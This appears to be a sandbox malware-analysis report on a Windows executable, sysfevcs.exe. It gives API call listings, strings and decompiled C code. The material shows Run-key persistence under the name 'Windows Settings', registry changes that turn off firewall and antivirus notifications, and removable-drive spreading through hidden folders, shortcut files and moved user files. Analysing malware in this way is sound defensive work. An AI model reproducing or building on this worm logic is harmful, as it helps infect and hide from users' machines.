                                                                                                                                                                                                                                                                  0x00405f2c
                                                                                                                                                                                                                                                                  0x00405f39
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00405f39
                                                                                                                                                                                                                                                                  0x00405d6d
                                                                                                                                                                                                                                                                  0x00405d93
                                                                                                                                                                                                                                                                  0x00405e1e
                                                                                                                                                                                                                                                                  0x00405e25
                                                                                                                                                                                                                                                                  0x00405e2a
                                                                                                                                                                                                                                                                  0x00405e33
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00405e37
                                                                                                                                                                                                                                                                  0x00405e37
                                                                                                                                                                                                                                                                  0x00405d9f
                                                                                                                                                                                                                                                                  0x00405dae
                                                                                                                                                                                                                                                                  0x00405db4
                                                                                                                                                                                                                                                                  0x00405dbd
                                                                                                                                                                                                                                                                  0x00405dc4
                                                                                                                                                                                                                                                                  0x00405dcb
                                                                                                                                                                                                                                                                  0x00405de3
                                                                                                                                                                                                                                                                  0x00405e0b
                                                                                                                                                                                                                                                                  0x00405e18
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00405e18
                                                                                                                                                                                                                                                                  0x00405d0a
                                                                                                                                                                                                                                                                  0x00405d0a
                                                                                                                                                                                                                                                                  0x00405c96
                                                                                                                                                                                                                                                                  0x00405c9c
                                                                                                                                                                                                                                                                  0x00405ca0
                                                                                                                                                                                                                                                                  0x00405ca7
                                                                                                                                                                                                                                                                  0x00405cb1
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00405cb3
                                                                                                                                                                                                                                                                  0x00405cba
                                                                                                                                                                                                                                                                  0x00405cc9
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00405cc9
                                                                                                                                                                                                                                                                  0x00405cd7
                                                                                                                                                                                                                                                                  0x00405cd9
                                                                                                                                                                                                                                                                  0x00405cdc
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00405cdc
                                                                                                                                                                                                                                                                  0x00405be0

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(000007D0), ref: 00405B4E
                                                                                                                                                                                                                                                                  • PathFileExistsW.KERNELBASE(2596396235629365635), ref: 00405B7B
                                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(246266396537), ref: 00405B8A
                                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(2352338747374), ref: 00405B95
                                                                                                                                                                                                                                                                  • MoveFileA.KERNEL32 ref: 00405BA5
                                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,5858874), ref: 00405BC5
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00405BD1
                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00405BE0
                                                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,00413590,00000105), ref: 00405C06
                                                                                                                                                                                                                                                                  • PathFindFileNameW.SHLWAPI(00413590), ref: 00405C11
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00405C2E
                                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 00405C3E
                                                                                                                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00405C55
                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00405D0A
                                                                                                                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(%windir%,?,00000104), ref: 00405D21
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00405D3F
                                                                                                                                                                                                                                                                  • CopyFileW.KERNEL32(00413590,?,00000000), ref: 00405D56
                                                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000003), ref: 00405D6D
                                                                                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,00020006,00000000), ref: 00405D8B
                                                                                                                                                                                                                                                                  • RegSetValueExW.ADVAPI32(00000000,Windows Settings,00000000,00000001,?,?), ref: 00405E0B
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00405E18
                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00405E37
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000001F4), ref: 00405E42
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00405E60
                                                                                                                                                                                                                                                                  • CopyFileW.KERNEL32(00413590,?,00000000), ref: 00405E77
                                                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000003), ref: 00405E8E
                                                                                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,00020006,00000000), ref: 00405EAC
                                                                                                                                                                                                                                                                  • RegSetValueExW.ADVAPI32(00000000,Windows Settings,00000000,00000001,?,?), ref: 00405F2C
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00405F39
                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00405F58
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000001F4), ref: 00405F63
                                                                                                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Security Center,00000000,00020006,00000000), ref: 00405F81
                                                                                                                                                                                                                                                                  • RegSetValueExA.ADVAPI32(00000000,FirewallOverride,00000000,00000004,00000001,00000004), ref: 00405FA8
                                                                                                                                                                                                                                                                  • RegSetValueExA.ADVAPI32(00000000,FirewallDisableNotify,00000000,00000004,00000001,00000004), ref: 00405FC7
                                                                                                                                                                                                                                                                  • RegSetValueExA.ADVAPI32(00000000,AntiSpywareOverride,00000000,00000004,00000001,00000004), ref: 00405FE6
                                                                                                                                                                                                                                                                  • RegSetValueExA.ADVAPI32(00000000,AntiVirusOverride,00000000,00000004,00000001,00000004), ref: 00406005
                                                                                                                                                                                                                                                                  • RegSetValueExA.ADVAPI32(00000000,AntiVirusDisableNotify,00000000,00000004,00000001,00000004), ref: 00406024
                                                                                                                                                                                                                                                                  • RegSetValueExA.ADVAPI32(00000000,UpdatesOverride,00000000,00000004,00000001,00000004), ref: 00406043
                                                                                                                                                                                                                                                                  • RegSetValueExA.ADVAPI32(00000000,UpdatesDisableNotify,00000000,00000004,00000001,00000004), ref: 00406062
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0040606F
                                                                                                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Security Center\Svc,00000000,00020006,00000000), ref: 0040608D
                                                                                                                                                                                                                                                                  • RegSetValueExA.ADVAPI32(00000000,FirewallOverride,00000000,00000004,00000001,00000004), ref: 004060B4
                                                                                                                                                                                                                                                                  • RegSetValueExA.ADVAPI32(00000000,FirewallDisableNotify,00000000,00000004,00000001,00000004), ref: 004060D3
                                                                                                                                                                                                                                                                  • RegSetValueExA.ADVAPI32(00000000,AntiSpywareOverride,00000000,00000004,00000001,00000004), ref: 004060F2
                                                                                                                                                                                                                                                                  • RegSetValueExA.ADVAPI32(00000000,AntiVirusOverride,00000000,00000004,00000001,00000004), ref: 00406111
                                                                                                                                                                                                                                                                  • RegSetValueExA.ADVAPI32(00000000,AntiVirusDisableNotify,00000000,00000004,00000001,00000004), ref: 00406130
                                                                                                                                                                                                                                                                  • RegSetValueExA.ADVAPI32(00000000,UpdatesOverride,00000000,00000004,00000001,00000004), ref: 0040614F
                                                                                                                                                                                                                                                                  • RegSetValueExA.ADVAPI32(00000000,UpdatesDisableNotify,00000000,00000004,00000001,00000004), ref: 0040616E
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0040617B
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000001F4), ref: 00406186
                                                                                                                                                                                                                                                                  • WSAStartup.WS2_32(00000202,?), ref: 004061A8
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 004061BF
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 004061D9
                                                                                                                                                                                                                                                                  • CreateThread.KERNEL32 ref: 004061F1
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 004061FC
                                                                                                                                                                                                                                                                  • CreateThread.KERNEL32 ref: 00406211
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040621C
                                                                                                                                                                                                                                                                  • CreateThread.KERNEL32 ref: 00406231
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00002710), ref: 0040623C
                                                                                                                                                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00406259
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Value$File$Sleep$Createwsprintf$CloseExitOpenProcess$DeleteThread$AttributesCopyEnvironmentExpandNamePathStrings$ErrorEventExistsFindLastModuleMoveMutexStartup
                                                                                                                                                                                                                                                                  • String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\tbcmds.dat$%s\tbnds.dat$%userprofile%$%windir%$2346836423674$2352338747374$246266396537$2596396235629365635$2959359672365276$5858874$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Settings$sysfevcs.exe$+A
                                                                                                                                                                                                                                                                  • API String ID: 2159060516-4122399374
                                                                                                                                                                                                                                                                  • Opcode ID: 1783e0d66f95a60c63e06c032a63fbc2f9e30346a76f0e4b0b2803a0e9e188b6
                                                                                                                                                                                                                                                                  • Instruction ID: 92e1a68c9bc006c386a89a388cf1530c15af291c072a27ad18b719b30f1901aa
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1783e0d66f95a60c63e06c032a63fbc2f9e30346a76f0e4b0b2803a0e9e188b6
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2123EB1A80318ABE7309B50DD4AF997778EB44B04F5081B5F309BA1D1D7B46A84CF5D
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 68 404cf0-404d05 _chkstk 69 404d07-404d09 68->69 70 404d0e-404dc0 wsprintfW * 5 PathFileExistsW 68->70 71 4051c5-4051c8 69->71 72 404dc2-404de3 call 40cea0 70->72 73 404e04-404e13 PathFileExistsW 70->73 72->73 86 404de5-404dfe SetFileAttributesW DeleteFileW 72->86 75 404e80-404e8f PathFileExistsW 73->75 76 404e15-404e24 PathFileExistsW 73->76 79 404e91-404e97 75->79 80 404ed6-404ef7 FindFirstFileW 75->80 77 404e26-404e37 CreateDirectoryW 76->77 78 404e48-404e57 PathFileExistsW 76->78 77->78 82 404e39-404e42 SetFileAttributesW 77->82 78->75 83 404e59-404e6f CopyFileW 78->83 84 404eb1-404ec4 call 404aa0 79->84 85 404e99-404eaf call 404aa0 79->85 87 404efd-404fb5 80->87 88 4051bf 80->88 82->78 83->75 90 404e71-404e7a SetFileAttributesW 83->90 99 404ec7-404ed0 SetFileAttributesW 84->99 85->99 86->73 89 404fbf-404fd3 lstrcmpW 87->89 88->71 93 404fd5-404fe9 lstrcmpW 89->93 94 404feb 89->94 90->75 93->94 97 404ff0-405001 93->97 98 405196-4051ac FindNextFileW 94->98 100 405012-405019 97->100 101 405003-40500c 97->101 98->89 102 4051b2-4051b9 FindClose 98->102 99->80 103 405047-405050 100->103 104 40501b-405038 lstrcmpiW 100->104 101->100 102->88 107 405052 103->107 108 405057-405068 103->108 105 40503a 104->105 106 40503c-405043 104->106 105->101 106->103 107->98 109 405079-405080 108->109 110 40506a-405073 108->110 111 4050f0-4050f9 109->111 112 405082-40509f PathMatchSpecW 109->112 110->109 113 405100-40510f PathFileExistsW 111->113 114 4050fb 111->114 115 4050a1 112->115 116 4050a3-4050e9 wsprintfW SetFileAttributesW DeleteFileW 112->116 117 405111 113->117 118 405116-405166 wsprintfW * 2 113->118 114->98 115->110 116->111 117->98 119 405180-405190 MoveFileExW 118->119 120 405168-40517e call 404bb0 118->120 119->98 120->98
                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E00404CF0(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16) {
                                                                                                                                                                                                                                                                  				short _v524;
                                                                                                                                                                                                                                                                  				short _v1044;
                                                                                                                                                                                                                                                                  				short _v1564;
                                                                                                                                                                                                                                                                  				short _v2084;
                                                                                                                                                                                                                                                                  				intOrPtr _v2088;
                                                                                                                                                                                                                                                                  				short _v2612;
                                                                                                                                                                                                                                                                  				short _v3132;
                                                                                                                                                                                                                                                                  				char _v3133;
                                                                                                                                                                                                                                                                  				struct _WIN32_FIND_DATAW _v3732;
                                                                                                                                                                                                                                                                  				short _v4252;
                                                                                                                                                                                                                                                                  				void* _v4256;
                                                                                                                                                                                                                                                                  				short _v4780;
                                                                                                                                                                                                                                                                  				intOrPtr _v4784;
                                                                                                                                                                                                                                                                  				WCHAR* _v4788;
                                                                                                                                                                                                                                                                  				WCHAR* _v4792;
                                                                                                                                                                                                                                                                  				WCHAR* _v4796;
                                                                                                                                                                                                                                                                  				WCHAR* _v4800;
                                                                                                                                                                                                                                                                  				WCHAR* _v4804;
                                                                                                                                                                                                                                                                  				intOrPtr _v4808;
                                                                                                                                                                                                                                                                  				WCHAR* _v4812;
                                                                                                                                                                                                                                                                  				WCHAR* _v4816;
                                                                                                                                                                                                                                                                  				WCHAR* _v4820;
                                                                                                                                                                                                                                                                  				WCHAR* _v4824;
                                                                                                                                                                                                                                                                  				WCHAR* _v4828;
                                                                                                                                                                                                                                                                  				WCHAR* _v4832;
                                                                                                                                                                                                                                                                  				WCHAR* _v4836;
                                                                                                                                                                                                                                                                  				WCHAR* _v4840;
                                                                                                                                                                                                                                                                  				WCHAR* _v4844;
                                                                                                                                                                                                                                                                  				WCHAR* _v4848;
                                                                                                                                                                                                                                                                  				WCHAR* _v4852;
                                                                                                                                                                                                                                                                  				WCHAR* _v4856;
                                                                                                                                                                                                                                                                  				WCHAR* _v4860;
                                                                                                                                                                                                                                                                  				signed char _v4861;
                                                                                                                                                                                                                                                                  				signed char _v4862;
                                                                                                                                                                                                                                                                  				signed int _v4868;
                                                                                                                                                                                                                                                                  				signed int _v4872;
                                                                                                                                                                                                                                                                  				intOrPtr _t167;
                                                                                                                                                                                                                                                                  				intOrPtr _t195;
                                                                                                                                                                                                                                                                  				void* _t218;
                                                                                                                                                                                                                                                                  				void* _t219;
                                                                                                                                                                                                                                                                  				void* _t224;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				L0040EB2A();
                                                                                                                                                                                                                                                                  				if((_a12 & 0x00080000) != 0) {
                                                                                                                                                                                                                                                                  					return 0;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_v2088 = 0x412c2c;
                                                                                                                                                                                                                                                                  				_v3133 = 0;
                                                                                                                                                                                                                                                                  				wsprintfW( &_v1564, L"%s.lnk", _a8);
                                                                                                                                                                                                                                                                  				wsprintfW( &_v4252, L"%s\\%s", _a4, _v2088);
                                                                                                                                                                                                                                                                  				wsprintfW( &_v4780, L"%s\\%s\\VolDriver.exe", _a4, _v2088);
                                                                                                                                                                                                                                                                  				wsprintfW( &_v2612, L"%s\\%s", _a4,  &_v1564);
                                                                                                                                                                                                                                                                  				wsprintfW( &_v1044, L"%s\\*", _a4);
                                                                                                                                                                                                                                                                  				_t224 = _t219 + 0x48;
                                                                                                                                                                                                                                                                  				if(PathFileExistsW( &_v4780) != 0) {
                                                                                                                                                                                                                                                                  					_t167 = E0040CEA0( &_v4780);
                                                                                                                                                                                                                                                                  					_t224 = _t224 + 4;
                                                                                                                                                                                                                                                                  					_v4784 = _t167;
                                                                                                                                                                                                                                                                  					_t195 =  *0x412f70; // 0x0
                                                                                                                                                                                                                                                                  					if(_t195 != _v4784) {
                                                                                                                                                                                                                                                                  						SetFileAttributesW( &_v4780, 0x80);
                                                                                                                                                                                                                                                                  						DeleteFileW( &_v4780);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				if(PathFileExistsW( &_v4780) == 0) {
                                                                                                                                                                                                                                                                  					if(PathFileExistsW( &_v4252) == 0 && CreateDirectoryW( &_v4252, 0) != 0) {
                                                                                                                                                                                                                                                                  						SetFileAttributesW( &_v4252, 2);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					if(PathFileExistsW( &_v4252) != 0 && CopyFileW(0x412f78,  &_v4780, 0) != 0) {
                                                                                                                                                                                                                                                                  						SetFileAttributesW( &_v4780, 2);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				if(PathFileExistsW( &_v2612) == 0) {
                                                                                                                                                                                                                                                                  					if((_a16 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                  						E00404AA0( &_v2612, L"shell32.dll", 8);
                                                                                                                                                                                                                                                                  						_t224 = _t224 + 0xc;
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						E00404AA0( &_v2612, L"shell32.dll", 9);
                                                                                                                                                                                                                                                                  						_t224 = _t224 + 0xc;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					SetFileAttributesW( &_v2612, 1);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_v4256 = FindFirstFileW( &_v1044,  &_v3732);
                                                                                                                                                                                                                                                                  				if(_v4256 == 0xffffffff) {
                                                                                                                                                                                                                                                                  					L45:
                                                                                                                                                                                                                                                                  					return _v3133;
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					_v4860 = L"*.lnk";
                                                                                                                                                                                                                                                                  					_v4856 = L"*.vbs";
                                                                                                                                                                                                                                                                  					_v4852 = L"*.js";
                                                                                                                                                                                                                                                                  					_v4848 = L"*.scr";
                                                                                                                                                                                                                                                                  					_v4844 = L"*.com";
                                                                                                                                                                                                                                                                  					_v4840 = L"*.jse";
                                                                                                                                                                                                                                                                  					_v4836 = L"*.cmd";
                                                                                                                                                                                                                                                                  					_v4832 = L"*.pif";
                                                                                                                                                                                                                                                                  					_v4828 = L"*.jar";
                                                                                                                                                                                                                                                                  					_v4824 = L"*.dll";
                                                                                                                                                                                                                                                                  					_v4820 = L"*.vbe";
                                                                                                                                                                                                                                                                  					_v4816 = L"*.bat";
                                                                                                                                                                                                                                                                  					_v4812 = L"*.inf";
                                                                                                                                                                                                                                                                  					_v4808 = _v2088;
                                                                                                                                                                                                                                                                  					_v4804 =  &_v1564;
                                                                                                                                                                                                                                                                  					_v4800 = L"Thumbs.db";
                                                                                                                                                                                                                                                                  					_v4796 = L"$RECYCLE.BIN";
                                                                                                                                                                                                                                                                  					_v4792 = L"desktop.ini";
                                                                                                                                                                                                                                                                  					_v4788 = L"System Volume Information";
                                                                                                                                                                                                                                                                  					do {
                                                                                                                                                                                                                                                                  						if(lstrcmpW( &(_v3732.cFileName), ".") != 0 && lstrcmpW( &(_v3732.cFileName), L"..") != 0) {
                                                                                                                                                                                                                                                                  							_v4862 = 0;
                                                                                                                                                                                                                                                                  							_v4868 = 0;
                                                                                                                                                                                                                                                                  							while(_v4868 < 6) {
                                                                                                                                                                                                                                                                  								if(lstrcmpiW( &(_v3732.cFileName),  *(_t218 + _v4868 * 4 - 0x12c4)) == 0) {
                                                                                                                                                                                                                                                                  									_v4862 = 1;
                                                                                                                                                                                                                                                                  									break;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								_v4868 = _v4868 + 1;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							if((_v4862 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                  								_v4861 = 0;
                                                                                                                                                                                                                                                                  								_v4872 = 0;
                                                                                                                                                                                                                                                                  								while(_v4872 < 0xd) {
                                                                                                                                                                                                                                                                  									if(PathMatchSpecW( &(_v3732.cFileName),  *(_t218 + _v4872 * 4 - 0x12f8)) != 0) {
                                                                                                                                                                                                                                                                  										wsprintfW( &_v2084, L"%s\\%s", _a4,  &(_v3732.cFileName));
                                                                                                                                                                                                                                                                  										_t224 = _t224 + 0x10;
                                                                                                                                                                                                                                                                  										SetFileAttributesW( &_v2084, 0x80);
                                                                                                                                                                                                                                                                  										DeleteFileW( &_v2084);
                                                                                                                                                                                                                                                                  										_v4861 = 1;
                                                                                                                                                                                                                                                                  										break;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									_v4872 = _v4872 + 1;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								if((_v4861 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                  									if(PathFileExistsW( &_v4252) != 0) {
                                                                                                                                                                                                                                                                  										wsprintfW( &_v3132, L"%s\\%s", _a4,  &(_v3732.cFileName));
                                                                                                                                                                                                                                                                  										wsprintfW( &_v524, L"%s\\%s\\%s", _a4, _v2088,  &(_v3732.cFileName));
                                                                                                                                                                                                                                                                  										_t224 = _t224 + 0x24;
                                                                                                                                                                                                                                                                  										if((_v3732.dwFileAttributes & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                  											MoveFileExW( &_v3132,  &_v524, 9);
                                                                                                                                                                                                                                                                  										} else {
                                                                                                                                                                                                                                                                  											E00404BB0( &_v3132,  &_v524);
                                                                                                                                                                                                                                                                  											_t224 = _t224 + 8;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								goto L43;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						L43:
                                                                                                                                                                                                                                                                  					} while (FindNextFileW(_v4256,  &_v3732) != 0);
                                                                                                                                                                                                                                                                  					FindClose(_v4256);
                                                                                                                                                                                                                                                                  					goto L45;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  			}












































                                                                                                                                                                                                                                                                  0x00404cf8
                                                                                                                                                                                                                                                                  0x00404d05
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00404d07
                                                                                                                                                                                                                                                                  0x00404d0e
                                                                                                                                                                                                                                                                  0x00404d18
                                                                                                                                                                                                                                                                  0x00404d2f
                                                                                                                                                                                                                                                                  0x00404d4f
                                                                                                                                                                                                                                                                  0x00404d6f
                                                                                                                                                                                                                                                                  0x00404d8f
                                                                                                                                                                                                                                                                  0x00404da8
                                                                                                                                                                                                                                                                  0x00404dae
                                                                                                                                                                                                                                                                  0x00404dc0
                                                                                                                                                                                                                                                                  0x00404dc9
                                                                                                                                                                                                                                                                  0x00404dce
                                                                                                                                                                                                                                                                  0x00404dd1
                                                                                                                                                                                                                                                                  0x00404dd7
                                                                                                                                                                                                                                                                  0x00404de3
                                                                                                                                                                                                                                                                  0x00404df1
                                                                                                                                                                                                                                                                  0x00404dfe
                                                                                                                                                                                                                                                                  0x00404dfe
                                                                                                                                                                                                                                                                  0x00404de3
                                                                                                                                                                                                                                                                  0x00404e13
                                                                                                                                                                                                                                                                  0x00404e24
                                                                                                                                                                                                                                                                  0x00404e42
                                                                                                                                                                                                                                                                  0x00404e42
                                                                                                                                                                                                                                                                  0x00404e57
                                                                                                                                                                                                                                                                  0x00404e7a
                                                                                                                                                                                                                                                                  0x00404e7a
                                                                                                                                                                                                                                                                  0x00404e57
                                                                                                                                                                                                                                                                  0x00404e8f
                                                                                                                                                                                                                                                                  0x00404e97
                                                                                                                                                                                                                                                                  0x00404ebf
                                                                                                                                                                                                                                                                  0x00404ec4
                                                                                                                                                                                                                                                                  0x00404e99
                                                                                                                                                                                                                                                                  0x00404ea7
                                                                                                                                                                                                                                                                  0x00404eac
                                                                                                                                                                                                                                                                  0x00404eac
                                                                                                                                                                                                                                                                  0x00404ed0
                                                                                                                                                                                                                                                                  0x00404ed0
                                                                                                                                                                                                                                                                  0x00404eea
                                                                                                                                                                                                                                                                  0x00404ef7
                                                                                                                                                                                                                                                                  0x004051bf
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00404efd
                                                                                                                                                                                                                                                                  0x00404efd
                                                                                                                                                                                                                                                                  0x00404f07
                                                                                                                                                                                                                                                                  0x00404f11
                                                                                                                                                                                                                                                                  0x00404f1b
                                                                                                                                                                                                                                                                  0x00404f25
                                                                                                                                                                                                                                                                  0x00404f2f
                                                                                                                                                                                                                                                                  0x00404f39
                                                                                                                                                                                                                                                                  0x00404f43
                                                                                                                                                                                                                                                                  0x00404f4d
                                                                                                                                                                                                                                                                  0x00404f57
                                                                                                                                                                                                                                                                  0x00404f61
                                                                                                                                                                                                                                                                  0x00404f6b
                                                                                                                                                                                                                                                                  0x00404f75
                                                                                                                                                                                                                                                                  0x00404f85
                                                                                                                                                                                                                                                                  0x00404f91
                                                                                                                                                                                                                                                                  0x00404f97
                                                                                                                                                                                                                                                                  0x00404fa1
                                                                                                                                                                                                                                                                  0x00404fab
                                                                                                                                                                                                                                                                  0x00404fb5
                                                                                                                                                                                                                                                                  0x00404fbf
                                                                                                                                                                                                                                                                  0x00404fd3
                                                                                                                                                                                                                                                                  0x00404ff0
                                                                                                                                                                                                                                                                  0x00404ff7
                                                                                                                                                                                                                                                                  0x00405012
                                                                                                                                                                                                                                                                  0x00405038
                                                                                                                                                                                                                                                                  0x0040503c
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040503c
                                                                                                                                                                                                                                                                  0x0040500c
                                                                                                                                                                                                                                                                  0x0040500c
                                                                                                                                                                                                                                                                  0x00405050
                                                                                                                                                                                                                                                                  0x00405057
                                                                                                                                                                                                                                                                  0x0040505e
                                                                                                                                                                                                                                                                  0x00405079
                                                                                                                                                                                                                                                                  0x0040509f
                                                                                                                                                                                                                                                                  0x004050ba
                                                                                                                                                                                                                                                                  0x004050c0
                                                                                                                                                                                                                                                                  0x004050cf
                                                                                                                                                                                                                                                                  0x004050dc
                                                                                                                                                                                                                                                                  0x004050e2
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004050e2
                                                                                                                                                                                                                                                                  0x00405073
                                                                                                                                                                                                                                                                  0x00405073
                                                                                                                                                                                                                                                                  0x004050f9
                                                                                                                                                                                                                                                                  0x0040510f
                                                                                                                                                                                                                                                                  0x0040512d
                                                                                                                                                                                                                                                                  0x00405154
                                                                                                                                                                                                                                                                  0x0040515a
                                                                                                                                                                                                                                                                  0x00405166
                                                                                                                                                                                                                                                                  0x00405190
                                                                                                                                                                                                                                                                  0x00405168
                                                                                                                                                                                                                                                                  0x00405176
                                                                                                                                                                                                                                                                  0x0040517b
                                                                                                                                                                                                                                                                  0x0040517b
                                                                                                                                                                                                                                                                  0x00405166
                                                                                                                                                                                                                                                                  0x0040510f
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004050f9
                                                                                                                                                                                                                                                                  0x00405052
                                                                                                                                                                                                                                                                  0x00405196
                                                                                                                                                                                                                                                                  0x004051aa
                                                                                                                                                                                                                                                                  0x004051b9
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004051b9

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _chkstk.NTDLL(?,00405340,?,?,?), ref: 00404CF8
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00404D2F
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00404D4F
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00404D6F
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00404D8F
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00404DA8
                                                                                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 00404DB8
                                                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000080), ref: 00404DF1
